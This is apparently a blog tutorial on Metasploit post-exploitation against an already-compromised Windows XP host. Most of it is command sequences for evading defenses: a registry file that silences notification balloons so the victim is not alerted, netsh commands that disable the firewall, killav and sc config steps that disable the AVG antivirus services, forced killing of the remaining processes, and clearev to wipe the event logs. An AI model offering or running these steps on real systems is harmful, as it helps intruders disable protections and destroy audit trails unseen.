metasploit

 

 

 

One of the most important parts while performing a penetration test is too able to work undetected. A firewall may block you and an antivirus software may detect your activities.If an antivirus detects your activities the penetration test will not look so professional in the eyes of your client.

 

 

 

 

 

So one of the first things that you may want to try when you have exploited the remote system is to disable any antivirus solution and firewall.For this article we will use the Windows Firewall and the AVG 2014 as an antivirus.

 

 

 

 

 

Lets say that we have exploited the remote machine which in this scenario is running Windows XP as an operating system and we got a SYSTEM Privileges.

 

 

 

Screenshot from 2014-06-17 19:36:15

 

 

 

 

 

We will instruct meterpreter to give us a shell to the remote system with the command shell.

 

 

 

 

Now we need to check if the remote system has the Firewall enabled.We will use the command: netsh firewall show opmode

 

 

 

#meterperter  > shell

 

 

 

C:\Windows\System32  > netsh firewall show opmode

 

 

 

It will show the firewall is enbaled or not in the victims machine.

 

 

 

 

Screenshot from 2014-06-17 19:43:07

 

 

 

 

If it enabled, we need to disble it. Before disabling the firewall, we need to turn off the notification ballon because whenever made a important changes in system the notification gets appear its make the victims alerting..

 

 

 

so i create a registry file and upload it to the victims machine to turn off notification alerts,for that open your terminal and add an below entry and save it in .reg file.

 

 

 

 

 

#vi disable.reg

 

 

Windows Registry Editor Version 5.00

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

 

“TaskbarNoNotification”=dword:00000001

 

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]

 

“TaskbarNoNotification”=-

 

 

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]

 

“EnableBalloonTips”=-

 

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]

 

“EnableBalloonTips”=-

 

 

:wq!

 

 

 

 

 

 

 

 

From your meterpreter session upload this file into the victims machine and execute this file in commmand prompt.

 

 

 

 

 

#meterperter  >  upload /home/sathish/disble.reg C:\\Users\Public

 

 

 

#meterperter  > shell

 

 

 

C:\Windows\System32  >  cd c:\users\public

 

 

C:\Users\Public  >  regedit.exe /s  C:\Users\Public\disable.reg

 

 

 

 

 

 

 

 

 

Disable the Windows Firewall

 

 

 

As we can see the firewall is enabled.In order to disabled it we will use the command: netsh firewall set opmode mode=disable.

 

 

 

C:\Windows\System32 > netsh firewall set opmode mode=disable

 

 

 

Screenshot from 2014-06-17 19:45:24

 

 

We can check the remote system in order to see if the firewall has been disabled successfully.

 

 

 

 

 

 

 

Killav Meterpreter script

 

 

The firewall has been disabled and now it is time to kill the antivirus.So we will return back to the meterpreter session and we will run the command killav.

 

 

 

#meterperter > killav

 

 

 

 

 

We can  see that this script that meterpreter has it killed some services including the avgrsx.exe.We may assume that the AVG antivirus is now disabled but the reality is different.

 

 

 

 

 

As you can see there is a list with names of processes of well-known antivirus.So when we run the killav script it actually tried to match the existing processes on the list with the processes on the remote host in order to find the antivirus and kill it.Now lets try to investigate the processes on the remote target after we have executed the killav script.

 

 

 

 

#meterperter > ps

 

 

 

 

 

You  can see that  there are still some avg processes that are running.So the meterpreter script it didn’t work as expected.

 

 

 

 

 

 

 

Now we will try to categorize these processes in order to see in which service they belong.The command that we are going to use is the tasklist /svc

 

 

 

We are interesting only for the avg services and their processes so we will use the command tasklist /svc | find /I “avg” in order to discover them.So in this way we have instruct the remote system to give us a result with the services that have image name that starts with avg.

 

 

 

 

 

#meterperter > shell

 

 

 

C:\Windows\System32  > tasklist  /svc | find  /I  “avg”

 

 

 

Screenshot from 2014-06-17 20:34:20

 

 

 

 

These are the processes that we need to kill it.However if we try to do we will notice that it will not have any affect because the services avgwd and AVGIDSAgent will restart these processes once they get killed.So lets try to examine these two services and their attributes.

 

 

 

 

 

C:\Windows\System32  > sc queryex  avgwd

 

 

C:\Windows\System32  > sc queryex AVGIDSAgent

 

 

 

 

As you can see from the image above these two services cannot be stopped and cannot be paused.So how you are supposed to disable an antivirus which have services that cannot be stopped or paused?The only solution valid solution is to try to disable the services so with the next reboot of the target these services will not start.We can achieve that by executing the following commands that you can see in the image below.

 

 

 

 

 

 

 

C:\Windows\System32  > sc config avgwd  start= disabled

 

 

 

 

 

C:\Windows\System32  > sc config AVGIDSAgent  start= disabled

 

 

 

 

Screenshot from 2014-06-17 20:38:39

 

 

 

 

We will reboot the remote target through the meterpreter

 

 

 

 

Now that the system has restarted it is time to examine if there are any avg processes that are still running.

 

 

 

 

 

#meterperter > shell

 

 

 

C:\Windows\System32  > tasklist  /svc | find  /I  “avg”

 

 

 

 

 

We have notice from this output that there are 5 processes and the two processes that correspond to avgwd and AVGIDSAgent services are missing.This is because we have disable them before the reboot.So we can now kill these 5 processes safely.

 

 

 

 

Kill the remaining AVG processes

 

 

 

C:\Windows\System32  > taskkill  /F  /IM  “avg”

 

 

 

The antivirus is now disabled on the remote target and we can now continue our work without any fear of being interrupted and discovered by an antivirus or a firewall.

 

 

 

 

 

 

Clear the log files

 

 

 

The last thing that we may want to try is to clear the system log files.We can run the command clearev in the meterpreter in order to delete all records from the event viewer.

 

 

 

#meterperter > clearev

 

 

 

 

Screenshot from 2014-06-17 20:43:14

 

 

 

 

 

 

Conclusion

 

 

 

Every penetration tester needs to know how to disable a firewall or an antivirus remotely.This is very essential for his penetration testing activities.However as we saw the meterpreter script didn’t manage to disable the antivirus.This is a proof that a penetration test is not an automatic process and it requires also the human factor.

 

 

 

Except of that the main disadvantage was that this method required to reboot the remote target in order to disable the antivirus so if someone was working at the system he would have noticed that something is going wrong besides the fact that it would have affection to his work.However in a system that nobody is working it is an effective method.